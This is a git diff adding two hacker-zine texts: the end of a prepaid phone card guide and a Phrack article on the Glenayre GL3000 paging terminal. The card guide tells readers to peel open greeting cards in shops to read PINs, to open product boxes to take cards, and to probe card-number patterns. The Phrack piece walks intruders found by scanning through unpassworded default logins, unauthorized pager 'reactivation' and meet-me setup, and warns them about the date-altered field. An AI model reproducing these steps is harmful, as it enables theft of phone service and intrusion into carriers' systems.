+card.  They are poly-wrapped so they think you won't see the dialup & PIN,
+but, DAMN, they're wrong.  The card has a cheap layer of glue on the middle
+so if you free the card from it's gluey seal, you can pull the plastic back
+to reveal the dialup and PIN.  I enjoy spending spare time going to Hallmark
+getting the PINs, leaving the card behind so I can have the joy of someone
+else buying the card and getting no time!!
+
+There are 3 dialups for the 3 kinds of cards.  It doesn't matter what
+dialup you use, all work for any card.  The first is the regular greeting for
+the normal cards:  [800] 504-1115.  For the Happy Holidays greeting, call
+[800] 203-1225.  The Valentine Line has a new and original message, which
+for the first time says Sprint before Hallmark, at [800] 214-0214.  All of
+these cards are 10 digits.
+
+They have a Customer Service which is really just a branch of the large
+Sprint CS, at [800] 516-2121.  The last fact about the Hallmark PCCs is
+that their quality has become more flimsy with each new line of card.
+For example, the first kind was hard like a normal PCC, but now the
+Valentine's Day cards are shitty as hell...like a normal sheet of paper.
+
+Hallmark also has this nifty little ANi thingee they use.  The computers
+at Sprint know the PiN you used PLUS the number you called PLUS the
+number you called from.  If you find a PiN just call up their Customer
+Service and you can find out who people called and from what number.
+
+  ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )
+
+Now we have the Pepsi-Cola company.  They are stupid asses who offer lousy
+service, but help hackers.  They list the dialup on the back of the box!
+The cards are randomly inserted in Pepsi Holiday 12 Packs.  Just go to any
+Grocery Store and open the boxes looking for the cards.  This PCC would have
+to claim the most money spent on advertising, since it is the only one with
+a TV commercial.  Plus the cards are only good for 5 minutes of LD,  no Int'l.
+The dialup is [800] 929-COLA (3642).  Once you call it says, "Enter Your
+14 Digit Code."  That's just asking to be ripped off.
+
+ ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )
+
+7-11, the slurpee guys, are now working with AT&T to bring you their
+7-11 Phone Cards.  It's supposed to save 50% or more than a LD collect call or
+normal calling card. Obviously this is a big crock of shit.  On the brochure
+it shows a data table comparing a 3 minute call from LA to NY.  It says a 7-11
+Phone Card is $1.00, Collect Call is $3, a Payphone is $2.70, and a normal
+calling card is $1.70.  I know when I call LD it's only like 15 cents so a
+minute, not this ripoff.  They are available in 15, 30 or 60 minute cards.
+I found a nice sales pitch on the brochure.  It says "After your time is used
+up, the card becomes inactive and you just buy a new card!"  Yeah, right.
+With this PCC you can call Int'l.  One main clue is that one side of the
+brochure is all in Spanish.  But it says all calls must originate from within
+the US.  (So you can't give them to your German friends and say they're real
+Calling Cards.)  It warns you that since international rates vary a 15 minute
+card could only be 5 minutes.  They don't actually give you that amount of
+time; it depends entirely on where you call.  It's setup so you have a certain
+amount of credit and once that's used, fuck how many minutes are left...your
+time is up.  Remember, when you want a 7-11 card it is always best to ask
+for Habib-Jabib.  I don't have any further info on these cards, like dialups
+and shit.
+
+ ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )
+
+Var-Tec Telecom, (10XXX = 10811) the new baby bell out of Texas, is
+offering their version of PCCs called "Prepaid Phone Pass".  You can
+dial their automated service and enter a string of numbers to order the
+cards.  I know very little regarding this service, except you can order
+cards specifically for Domestic or for International calls, or both.
+
+Their automated service number is:  [800] 583-8811.  Once connected, enter
+this string of numbers:  6, 2 then 1 (To Talk To Consultant) or 3
+(For Orders).
+
+ ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )
+
+PCCs are not only for LD; some people are actually collecting them.
+No, not for any illegal services but as a hobby.  People like them for their
+pretty pictures of designs or special events.  People are comparing this to
+(*fun*) stamp and coin collecting.  So if there is a demand for new styles it
+must be found in a catalog, and I've found that catalog...for a price:
+
+        If you wish to order a 400 card catalog for $5 from :
+
+                        Lin Overholt
+                        PO Box 8481
+                        Madeira Beach, FL 33738
+
+        You can also purchase a publication entitled
+
+                "International Telephone Cards"
+
+        by writing to :
+
+                        29/35 Manor Road
+                        Colchester, Essex CO3 3LX
+                        Great Britain
+
+ ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )
+
+Electronics Boutique, or EB for short, is offering PCCs with $5 worth
+of LD on them.  Dialup is [800] 233-1363 with 9 digits PIN.  I know very,
+little regarding these.
+
+ ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )
+
+Shit From Al K. Lloyd [4o4]. Slightly Modified of course.
+
+Since I've started collecting these suckers,
+here's some other prepaids for you guys (Treason)
+to add to the file in BTR:
+
+- AT&T/Knights Inn [800] 357-PAID(7243) - 9 digits
+  Customer Service is [800] 462-1818
+  Glossy cardboard cards in 15 or 25 "units"
+  These are sold at the hotel chain
+
+- PrimeCall [800] 866-6915 - 14 digits
+  But try starting with 407-xxxx-xxxx-xxx (just a hunch)
+  Customer service [800] 938-4949
+  Card is plastic in $10 and $20-I think only one design w/a bunch of flags
+  on it; these guys are going for the international crowd (oddly enough,
+  these are the only ones I've seen dispensed from a machine)
+
+- Western Union [800] 374-8686 - 8 digits
+  These guys charges are ridiculous--try them 1st...
+  Customer Service is [800] 374-8686; the cards are thin cardboard to
+  boot-$10, $20, or $50
+
+- Caber Communications [800] 868-9871 - 10 digits
+  Caber/Talk Lite [800] 429-9547 - 10 digits
+  Customer Service is [800] 716-2444 or [404] 876-2444 (local to me)
+  Some of the nicest cards I've seen; $5, $10, and $20
+  Fairly good rates considering what there is to pick from (like Western
+  Union)
+
+These things keep popping up like mushrooms...
+Caber's rates just look good compared to Western Union :>
+Revco Talk n' Toss is the cheapest I've found so far...
+only available here in 10, 30, and 100 min. To my knowledge.
+
+Second cheapest is:
+Transcommunications, Inc.
+Transcard
+800-326-4880 11 digits
+800-772-7293 Customer Service
+
+Cards are also available in Spanish,  in $10 & $20 denominations
+(not marked on the card, cards can be recharged by CC @ 800-772-7293.)
+
+I found this at a Conoco gas station; according to their C.S. they're
+also available at various truck stops, Pilots, Kangaroos, and a bunch more.
+
+I tell ya, I run into a new one of these every time I turn around...
+
+Al
+
+ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Regarding Caber PCCs :
+
+Caber has sales reps that go to immigrant stores to unload the cards.  They
+carry their inventory in business card folders that seem to carry 46 cards
+or so.  If a folder got stolen, there is no way to tell who bought which card,
+unless it was a fresh folder (in which case they'd just notify the Co.).
+
+ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Caber Communications has 2 different kinds of cards, Caber and
+Talk Lite.  I'll categorize these by line and amount.  (The following are
+no longer valid cards.)
+
+
+Caber
+~~~~~
+$5.00       165-489-4170  537-697-8358  912-314-0132  262-820-0154
+            733-374-4010  758-499-2904  143-364-3554  ------------
+$10.00      305-323-5850  377-902-5824  907-042-1346  602-878-3072
+$20.00      767-610-2118  095-943-2248  448-047-2990  024-530-4614
+            590-074-9540
+
+Talk Lite
+~~~~~~~~~
+$5.00       863-406-9186  733-374-4010  590-074-9540
+$10.00      782-512-4340  940-704-3046  303-054-9748
+$20.00      355-227-7378  011-113-5408
+
+General Info
+~~~~~~~~~~~~
+I noticed some stuff in the Sunday coupon section.  Some food company is
+giving 10 minute cards if you send in proofs of purchase; so is Polaroid
+(with a nifty hologram kard).
+
+More Cards
+~~~~~~~~~~
+
+- Revco Talk N' Toss  - $?? -  128-341-864 - Dialup - See Separate Review
+- Sprint PCC's        - $10 - 403-398-8344 - Dialup - 800-659-1010 -
+
+
+[- You can try to find algorithms with those -]
+
+Yet another:
+
+Sprint Instant Foncard
+800-659-1010
+10 Digits
+
+800-366-0707 Customer Service
+Available in $5, $10, $20, and $50.
+
+Have you noticed just how *nice and helpful* the customer service people are?
+
+Later,
+Al
+
+ ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )
+
+A Post From An Unknown User in Atlanta :
+
+As far as PCC's go, I noticed on 4 or 5 of mine that all of the numbers were
+divisible by 33... Maybe there's some sort of algorithm that controls the
+numbers on these cards.  This particular case was an MCI/NBC sweepstakes, each
+card giving 10 minutes...
+
+Another thing to wonder about when "carding" these cards:  Sooner
+or later, someone must notice people carding.  So, do they track
+these cards or anything?  Or do you just have to use them short-term,
+etc...?  To anyone that works for a convenience store:  what's the
+policy on stolen cards?  Do you report them to AT&T or whomever as
+stolen?  Give them numbers?  And what follow up is done?
+
+ ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )
+
+Recently in a trip to Boston [617] I was at a magazine stand.  After
+I put down the newest Hustler I saw a rack of brochures from a service
+called "Worldcall 2000 - The World's Most Advanced Prepaid Telephone
+Service."  Since I was working on this text, I thought I'd pick
+it up for some info.
+
+Their cards some in $10, $20, $30 and $50 telephone card increments.
+They also have service available in 10 different languages, although what
+languages I don't know.  They have international and domestic dialing
+capabilities with cheap rates.  Plus, they have a built in VMB with forward
+messaging and recharge capability.  The customer service department is
+[800] 576-8522.
+
+Here's what you do:  Dial [800] 576-9959, enter the PiN, then for a domestic
+call, dial 1+ACN; for international dial 011+Number.  If you fuck up,
+just hit "*" to enter another number.  To make another call when you're
+done just hit "#".  That's a rather sweet feature.  (This is from AT&T.)
+
+ ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )
+
+Here's a first:  Recently at a local book store I was reading the new
+issue of Fangoria.  In it, I saw an add for Freddy Krueger PCCs!
+(you know the man...)  "Bullshit," I thought.  They come in 4 different
+cards, each with a new fun, gruesome decapitation by my man Freddy. Then
+the biggest bullshit of all:  "Good For Making Local Calls."  These
+cards are only available in 15 minute cards.  Plus they're $14.95 + $x.xx
+shipping and handling.  I don't know any more about them than that.
+
+ ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )
+
+Here's Some Stuff From Me Bud, Antediluvian [4o4]
+
+
+Drug Emporium is offering a $10 card with a total value for up to 25
+minutes. You can call both domestic and international. The number is:
+[800] 866-7495. One that I have already used is 2105-253-835, therefore they
+are 10 digits.
+
+I hear that Taco Bell has some awesome prepaids too. I'll look into that
+for you.  Also a friend of mine, ViRuS?, (with the question mark) who runs
+DCi has an algorithm for a prepaid, TLI or something like that... I have to
+deliver some files to him so I'll ask about it.
+                                        ...     Ante
+
+ ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )
+
+Here is a list of the numbers I went over and a brief note on each one.
+(Listed in order from least amount of digits to highest.)
+
+Systems
+~~~~~~~
+Pepsi                        [800] 929-CoLA - 14 Digits
+PrimeCall                    [800] 866-6915 - 14 Digits
+Transcard                    [800] 326-4880 - 11 Digits
+Sprint Instant Foncard       [800] 659-1010 - 10 Digits
+Caber Communications         [800] 868-9871 - 10 Digits
+Caber/Talk Lite              [800] 429-9547 - 10 Digits
+Talk n Toss/Revco Cards      [800] 213-0304 - 10 Digits
+Champs Sporting Goods        [800] 437-6404 - 10 Digits
+Hallmark/Sprint              [800] 504-1115 - 10 Digits
+Hallmark/Sprint/Holidays     [800] 203-1225 - 10 Digits
+Hallmark/Sprint/Valentines   [800] 214-0214 - 10 Digits
+Classic Games                [800] 868-9871 - 10 Digits
+Drug Emporium                [800] 866-7495 - 10 Digits
+AT&T/Knights Inn             [800] 357-PAiD - 9  Digits
+Electronic Boutiques         [800] 233-1363 - 9  Digits
+X-Men/Kay Bee Toys           [800] 616-8883 - 9  Digits
+Talk n Toss/Hello Direct     [800] 955-2383 - 9  Digits
+Western Union                [800] 374-8686 - 8  Digits
+WorldCall 2000               [800] 576-9959 - ?  Digits
+
+Other
+~~~~~
+Ordering GTE Football Cards  [800] GTE-3804 - Ordering GTE Football Cards
+Ordering GTE In 303 NPA      [303] 743-4138 - See Up + From Outside US
+Ordering GTE In 303 NPA Fax  [303] 727-4994 - Faxing Orders For GTE Footballs
+Talk n Toss/Revco/CS         [800] 354-2708 - Customer Service
+Talk n Toss Customer Service [800] 631-8895 - Ordering Bulk
+Var-Tec Telecom              [800] 583-8111 - Ordering Prepaid Phone Pass
+Caber Customer Service       [800] 716-2444 - Customer Service
+Caber Customer Service       [404] 876-2444 - Customer Service
+Primecall Customer Service   [800] 938-4949 - Customer Service
+Western Union CS             [800] 374-8686 - Customer Service
+AT&T/Knights Inn CS          [800] 462-1818 - Customer Service
+WorldCall 2000 CS            [800] 576-8522 - Customer Service
+Transcard CS                 [800] 772-7293 - Customer Service
+Sprint Instant Foncard       [800] 366-0707 - Customer Service
+
+------------------------------------------------------------------------------
+                                ThE EnD
+    For More Information Contact The Author Over The Internet At :
+
+                      : treason@fpg.gcomm.com :
+
+    Leave, Suggestions, Ideas, More Information and Collective Criticism
+
+                  "We Are The Damned Of All The World..."
+                                - Megadeth
+------------------------------------------------------------------------------
+                        ..........................
+                        .         - by -         .
+                        .     Treason [518]      .
+                        .        [PAiN]          .
+                        ..........................
+
+./\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\.
+.--=]] NoDE 1     Call Another Way Of Life BBS 518.383.1369     NoDE 1  [[=--.
+.\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/.
+
+./\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\.
+.--=]] NoDE 2     Call Another Way Of Life BBS 518.383.o268     NoDE 2  [[=--.
+.\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/.
diff --git a/phrack47/14.txt b/phrack47/14.txt
new file mode 100644
index 0000000..9344df4
--- /dev/null
+++ b/phrack47/14.txt
@@ -0,0 +1,642 @@
+                              ==Phrack Magazine==
+
+                 Volume Six, Issue Forty-Seven, File 14 of 22
+
+
+           The Glenayre GL3000 Paging and Voice Retrieval System
+                                 by armitage
+                             (armitage@dhp.com)
+
+                                  Welcome
+                                  -------
+    I am glad you decided to read this article.  This article will explain
+the basis of what this system is, show many features, and guide you through
+a few basic operations (pager reactivation, and meet-me setup).  This system
+is one of many different paging systems, but I have found many scattered
+through the nation, so if you are wondering what you can do with all those
+carriers found while scanning, compare them to the login screen shown later
+in the article.
+
+                                  Summary
+                                  -------
+
+    The Glenayre GL3000 paging and voice retrieval system is a fully featured
+digital radio paging terminal which also provides integrated voice mailbox
+facilities.
+
+    I'm sure this is not important, but so you know, the gl3000 family comes
+in 5 different respective sizes (es, s, m, l, and xl).  All of the systems
+have same features except the only thing that differs is their bandwidth, and
+their capabilities.
+
+    Analog and digital paging formats are supported, it provides for tone only,
+voice, numeric, and alphanumeric paging.
+
+                                  Features
+                                  --------
+Voice Mail Box Features
+-----------------------
+
+    The voice mail box feature of the system complements the pager router
+system very nicely.  This voice mail system is just like any other, so I
+won't go into detail over it.
+
+Programming
+
+  Mailbox access code
+    Main menu : 1
+    Subscriber Information Menu : 1
+    Search for subscribers to edit/create
+
+  Meetme access code
+    Supervisors Main Menu : 5
+    System Setup Menu : 3
+    Trunk Setup Menu : 11
+    Meet-me parameters
+
+  Audio Billboard
+    Supervisors Main Menu : 5
+    System Setup Menu : 9
+    Voice Storage and Mailbox Setup Menu : 2
+    Voice Mailbox Setup parameters
+
+  Pager Alert
+    Supervisors Main Menu : 5
+    System Setup Menu : 3
+    Trunk Setup Menu : 10
+    Caller Notification Message Setup
+
+Voice Main Menu Hierarchy
+-------------------------
+
+Supervisor's Main Menu
+1 < Subscriber Information Menu
+    1 < Edit/Create Subscribers
+    2 < Delete A Subscriber
+    3 < Report Subscriber Information
+    4 < Report Extended Group Members
+    5 < Report Unused Customer Numbers
+    6 < Report Initialized Centirecords
+    7 < Stop Current Report in Progress
+    8 < Send Test Page
+    9 < Block Change Subscribers
+    10 < Delete Several Subscribers
+    11 < Clear Subscriber Call Statistics
+    12 < Report Pager Type Summary
+    13 < Block Create Subscribers
+2 < User Number Information
+3 < System Activity Monitoring and Logging Menu
+    1 < Trunk Status & Activity Monitor
+    2 < UOE Status & Activity Monitor
+    3 < Buffer Memory Status & Activity Monitor
+    4 < Transmit Queue Status Activity Monitor
+    5 < Voice Storage Usage Activity Monitor
+    6 < Voice Storage Report Setup
+    7 < Voice Storage File Activity Monitor
+    8 < Activity Logging Setup
+    9 < Activity Logging Monitor
+    10 < Subscriber Database Information
+    11 < System CPU Activity Monitor
+    12 < Memory Pool Status Monitor
+    13 < RTC Status & Activity Monitor
+    14 < RTC Diagnostic Console
+4 < System Maintenance Menu
+    1 < Save Database and System Setup Parameters to floppy
+    2 < Add Customer Numbers
+    3 < Remove Customer Numbers
+    4 < Change Customer Numbers
+5 < System Setup Menu
+    1 < System Parameters
+    2 < Subscriber Setup Menu
+        1 < Subscriber Default Parameters
+        2 < Subscriber Reports Default Parameters
+    3 < Trunk Setup Menu
+        1 < Individual Trunk Parameters
+        2 < Trunk Group Parameters
+        3 < Trunk Card Parameters
+        4 < Common Trunk Parameters
+        5 < Common Trunk Statistics
+        6 < Common Trunk End of Call Parameters
+        7 < Roaming Caller Location Code Setup
+        8 < Digital Trunk Card Alarm Parameters
+        9 < Digital Trunk Address Signalling Protocol
+        10 < Caller Notification Message Setup
+        11 < Meet-me Parameters
+    4 < Buffer Memory Setup Menu
+        1 < Individual Buffer Memory Parameters
+        2 < Common Buffer Memory Parameters
+    5 < Universal Output Encoder (UOE) Setup Menu
+        1 < Individual UOE Parameters
+        2 < Common UOE Parameters
+        3 < UOE Test
+    6 < Transmitter Controller Setup Menu
+        1 < Individual Transmitter Controller Parameters
+        2 < Common Transmitter Controller Parameters
+    7 < Page Routing Setup Menu
+        1 < Logical Area Parameters
+        2 < Coverage Region Parameters
+    8 < Printer and Serial Port Setup Menu
+        1 < Serial Port Configuration Parameters
+        2 < Printer Message Parameters
+    9 < Voice Storage and Mailbox Setup Menu
+        1 < Voice Storage Setup Parameters
+        2 < Voice Mailbox Setup Parameters
+        3 < Voice Mailbox Retrieval Mode Key Translation Map
+        4 < Language Syntax Configuration
+    10 < Pager Parameter Setup Menu
+        1 < PUP/Repeat Page Options
+        2 < PUP/Repeat Page Function Code Setup
+        3 < Voice To Alpha Transcription Setup
+        4 < Numeric/Voice Function Code Setup
+    11 < RTC Port Configuration Parameters
+6 < Remote Sign-on
+7 < Network Menu
+    1 < Operator Services Menu
+        1 < Netmail Transmission
+        2 < Netmail Configuration
+    2 < Network Setup Menu
+        1 < Common Network Parameters
+        2 < Network Port Configuration Parameters
+        3 < Network Node Configuration Parameters
+        4 < Frequency Code to Coverage Region Map
+    3 < Network Activity Menu
+        1 < Port Status and Activity Monitor
+        2 < Node Status and Output Queue Activity Monitor
+8 < Traffic Statistics Menu
+    1 < Statistics Parameters
+    2 < Report Statistics
+9 < Superhex Patch Screen
+
+
+Operations
+----------
+
+*** Quick Reference Key Usage***
+
+  <DEL> - Deletes character to the left
+  <CTRL-R> - Re-draws Screen
+  UP - Moves pointer up
+  DOWN - Moves pointer down
+
+
+System Menus and Options  -  Navigating the System
+--------------------------------------------------
+
+***Changing Subscriber Info***
+
+                          Screen Shot Below
+-----------------------------------------------------------------------------
+                    GLENAYRE GL3000 PAGING TERMINAL       Version 3.06
+
+  1. User Number:________
+  2. Password:
+
+                      Optional Feature Status
+                         Agency:       ON
+                         Networking:   ON
+                         RTC:          ON
+                         Meet-me:      ON
+
+
+        Software Creation Date:  MMM DD/YY  HH:MM:SS
+
+                                                    Command:
+
+-----------------------------------------------------------------------------
+Logging in is the first step, as you can see you are prompted for a user
+number and password.  The Default for every account is unpassworded, the
+password does not echo on the screen.
+
+Please Note that the menu options are configured by the access level of your
+account, (for example, an administrators account will have more options than
+a base operators account).  The Menus displayed in this article account that
+a supervisors account is being used.
+
+
+                            Screen Shot Below
+-----------------------------------------------------------------------------
+
+                    GLENAYRE GL3000 PAGING TERMINAL       Version 3.06
+
+  1. Subscriber Information Menu
+  2. User Number Information
+  3. System Activity Monitoring and Logging Menu
+  4. System Maintenance Menu
+  5. System Setup Menu
+  6. Remote Signon
+  7. Network Menu
+  8. Statistics Menu
+  9. SUPERHEX Patch Screen
+
+  Currently Signed On:     User 1
+                           System Supervisor
+
+                                              Command:_________
+
+-----------------------------------------------------------------------------
+This is the Main menu of the system.  On a normal operators account, not all
+of the options will be available.
+
+*** To Add (Reactivate a pager) ***
+You want to is Add or "Create" a subscriber.  Go to menu 1 (Subscriber
+Information Menu).
+
+                            Screen Shot Below
+-----------------------------------------------------------------------------
+
+        SUBSCRIBER INFORMATION MENU
+
+  1. Edit/Create Subscribers
+  2. Delete a Subscriber
+  3. Report Subscriber Information
+  4. Report Extended Group Members
+  5. Report Unused Customer Numbers
+  6. Report Initialized Centi records
+  7. Stop Current Report in Progress
+  8. Send Test Page
+  9. Block Change Subscribers
+  10. Delete Several Subscribers
+  11. Clear Subscriber Call Statistics
+  12. Report Pager Type Summary
+  13. Block Create Subscribers
+
+                                                    Command:____________
+
+-----------------------------------------------------------------------------
+Now you need to go into option 1 again, to Create a new subscriber.
+
+                            Screen Shot Below
+-----------------------------------------------------------------------------
+
+Record 1 of 900    SEARCH FOR SUBSCRIBER TO EDIT/CREATE         Page 1 of 2
+
+  1.  Customer Number: _____             17. Language Choice:
+  2.  Partition:                         18. Answer Type:
+  3.  Agency Number:                     19. Custom Answer:
+  4.  Encoding Format:                   20. PUP/Repeat Option:
+  5.  Service Type:                      21. Group PUP Option:
+  6.  Capcode:                           22. Repeat Voice:
+                                         23. Mailbox Type:
+                                         24. Purge Time (Hrs):
+  7.  A-Tone Length:                     25. Maximum Messages:
+  8.  B-Tone Length:                     26. Voice Time:
+  9.  Account Number:                    27. Activate Caller Pwd:
+  10. Account Status:                    28. Access/Caller Pwd:
+  11. Account Code:                      29. Autoretrieval:
+  12. Valid:                             30. Meet-me:
+  13. Customer Absent:                   31. Secondary Number:
+  14. Coverage Region:
+  15. Priority:
+                                         34. Extended Group:
+  35. Sort Field #1:                     37. Sort Field #2:
+  36. Sort Order #1:                     38. Sort Order #2:
+
+                                                        Command:
+
+-----------------------------------------------------------------------------
+
+It is important at this point, not to enter information into any field other
+than field number 1, as after you enter the customer number, you enter the
+other information later.
+
+If you are entering a new subscriber, you want to enter a customer number
+that is not being used.  There will be a record number in the top left to
+show you which records are being used.  In this example we will use number 1.
+So enter the new number and then <RETURN>.  The type CREATE <RETURN> into
+the command line.
+
+                            Screen Shot Below
+-----------------------------------------------------------------------------
+
+Record 1 of 900    SEARCH FOR SUBSCRIBER TO EDIT/CREATE         Page 1 of 2
+
+  1.  Customer Number: 1____             17. Language Choice:     ENGLISH
+  2.  Partition:       A                 18. Answer Type:         SYS 216
+  3.  Agency Number:   0                 19. Custom Answer:       YES
+  4.  Encoding Format: TWOTONE           20. PUP/Repeat Option:   NO
+  5.  Service Type:    VOICE             21. Group PUP Option:    NONE
+  6.  Capcode:         000001F1          22. Repeat Voice:        3
+        A=0            B=0               23. Mailbox Type:        VOICE
+                                         24. Purge Time (Hrs):    NO PURGE
+  7.  A-Tone Length:   8                 25. Maximum Messages:    10
+  8.  B-Tone Length:   16                26. Voice Time:          8
+  9.  Account Number:  4                 27. Activate Caller Pwd: YES
+  10. Account Status:  3                 28. Access/Caller Pwd:   ####/####
+  11. Account Code:    7                 29. Autoretrieval:       NO
+  12. Valid:           YES               30. Meet-me:             NO
+  13. Customer Absent: NO                31. Secondary Number:
+  14. Coverage Region: 1
+  15. Priority:        5
+                                         34. Extended Group:      NO
+  35. Sort Field #1:                     37. Sort Field #2:
+  36. Sort Order #1:                     38. Sort Order #2:
+
+                                                        Command:
+
+-----------------------------------------------------------------------------
+The values that are filled into this screen are the defaults that were set
+by the supervisor.  Provided you have all the technical information on
+the inactive pager you have, you will transcribe the pager's technical
+information into this record.
+
+
+List of fields
+
+ Field 1 - Customer Number
+         Customer number, you may not use wild cards.
+ Field 2 - Partition
+         Any Partition Letter may be used. ['A'..'Z'] or a NOT sign followed
+         by a partition letter.
+ Field 3 - Agency Number
+         You may use any search conditions except wild cards.
+ Field 4 - Encoding Format
+         Any encoding format name, or a not sign followed by an encoding
+         format.
+ Field 5 - Service Type
+         You may use any service name, or a not sign w/service type name.
+          Service Names
+            VOICE
+            TONE-ONLY
+            NUMERIC
+            ALPHANUMERIC
+            NUMERIC/VOICE
+            MAILBOX ONLY
+            ROAMER
+            0 TONE ONLY
+            GREETING
+            ALPHAMAIL
+            TAS
+            MEET-ME
+            AUTORETRIEVAL
+ Field 6 - Capcode
+         You may use wild card characters to replace digits.
+ Field 7,8 - A,B-Tone Length
+         You can use any search but the wild card search.
+ Field 9 - Account Number
+         You can use any search but the wild card search.
+ Field 10 - Account Status
+         You can use any search but the wild card search.
+ Field 11 - Account Code
+         You can use any search but the wild card search.
+ Field 12 - Valid
+         YES or NO (valid/invalid account number)
+ Field 13 - Customer Absent
+         YES or NO (absent customer or not)
+ Field 14 - Coverage Region
+         You can use any search but the wild card search.
+ Field 15 - Priority
+         You can use any search but the wild card search.
+ Field 16 - Trace Calls
+         YES or NO
+ Field 17 - Language Choice
+         Simply enter a language of choice.
+ Field 18 - Answer Type
+         Use any search.
+ Field 19 - Customer Answer
+         YES, NO, INSERT, or APPEND
+ Field 20 - PUP/Repeat Option
+ Field 21 - Group PUP Option
+ Field 22 - Repeat Mailbox
+         You can use any search but the wild card search.
+ Field 23 - Mailbox Type
+         You can enter:
+           NO MAILBOX
+           VOICE
+           NUMERIC
+           BOTH
+ Field 24 - Purge Time (Hrs)
+         You can use any search.
+ Field 25 - Maximum Messages
+         You can use any search but the wild card search.
+ Field 26 - Voice Time
+         You can use any search but the wild card search.
+ Field 27 - Activate Caller Password
+         YES or NO
+ Field 28 - Access/Caller Password
+ Field 29 - Autoretrieval
+         YES or NO
+ Field 30 - Meet-me
+         YES or NO to have this subscriber given access to meet-me features.
+ Field 31 - Secondary Number
+         You can use any search but the wild card search.
+ Field 34 - Extended Group
+         YES or NO
+
+
+Now we will move on to the second page of the Section
+
+
+                            Screen Shot Below
+-----------------------------------------------------------------------------
+
+Record 1 of 900    SEARCH FOR SUBSCRIBER TO EDIT/CREATE         Page 2 of 2
+
+  Extended Group Members
+
+  81. Customer Number:                   41. System Recording:
+  82. Customer Number:                   42. Empty Data Pages:
+  83. Customer Number:                   43. Primary Numbers:
+  84. Customer Number:
+  85. Customer Number:
+  86. Customer Number:
+  87. Customer Number:
+  88. Customer Number:
+  89. Customer Number:
+  90. Customer Number:                   Statistical Fields:
+  91. Customer Number:                   51. Number of Calls
+  92. Customer Number:                   52. Mailbox Storage
+  93. Customer Number:                   53. Character Count:
+  94. Customer Number:                   54. Meet-me Time (mins):
+  95. Customer Number:                   55. Date Created:
+  96. Customer Number:                   56. Date Altered:
+
+                                                        Command:
+
+-----------------------------------------------------------------------------
+This page has little significance besides if you are using extended group
+members.  The one thing that is important is field 56.  Look out.
+
+
+
+***Setting up a Meet-me and its settings***
+
+
+                            Screen Shot Below
+-----------------------------------------------------------------------------
+
+                    GLENAYRE GL3000 PAGING TERMINAL       Version 3.06
+
+  1. Subscriber Information Menu
+  2. User Number Information
+  3. System Activity Monitoring and Logging Menu
+  4. System Maintenance Menu
+  5. System Setup Menu
+  6. Remote Signon
+  7. Network Menu
+  8. Statistics Menu
+  9. SUPERHEX Patch Screen
+
+  Currently Signed On:     User 1
+                           System Supervisor
+
+                                              Command:_________
+
+-----------------------------------------------------------------------------
+First you want to go into choice "5", The System Setup Menu.
+
+                            Screen Shot Below
+-----------------------------------------------------------------------------
+
+        SYSTEM SETUP MENU
+
+  1.  System Parameters
+  2.  Subscriber Setup Menu
+  3.  Trunk Setup Menu
+  4.  Buffer Memory Setup Menu
+  5.  Universal Output Encoder (UOE) Setup Menu
+  6.  Transmitter Controller Setup Menu
+  7.  Page Routing Setup Menu
+  8.  Printer and Port Setup Menu
+  9.  Voice Storage and Mailbox Setup Menu
+  10. Page Parameter Setup Menu
+  11. RTC Port Configuration Parameters
+
+                                              Command:_________
+
+-----------------------------------------------------------------------------
+
+>From this menu you want to go to the trunk setup menu which is choice "3".
+
+                            Screen Shot Below
+-----------------------------------------------------------------------------
+
+        TRUNK SETUP MENU
+
+  1.  Individual Trunk Parameters
+  2.  Trunk Group Parameters
+  3.  Trunk Card Parameters
+  4.  Common Trunk Parameters
+  5.  Common Trunk Statistics
+  6.  Common Trunk End Of Call Parameters
+  7.  Roaming Caller Location Code Setup
+  8.  Digital Trunk Card Alarm Parameters
+  9.  Digital Trunk Address Signalling Protocol
+  10. Caller Notification Message Setup
+  11. Meet-me Parameters
+
+                                              Command:_________
+
+-----------------------------------------------------------------------------
+>From this menu you want to select "11. Meet-me Parameters".
+
+                            Screen Shot Below
+-----------------------------------------------------------------------------
+
+        MEET-ME PARAMETERS
+
+  1. Length of Time to Play Initial Ring(s):
+  2. Wait Time Before Sending Meet-Me Page(s):
+  3. Meet-Me Help Message Interval(s):
+  4. Maximum Number of Meet-Me Help Message(s):
+  5. Tone Played While Waiting for Meet-Me:
+  6. Disable Disconnect Digital During Connection:
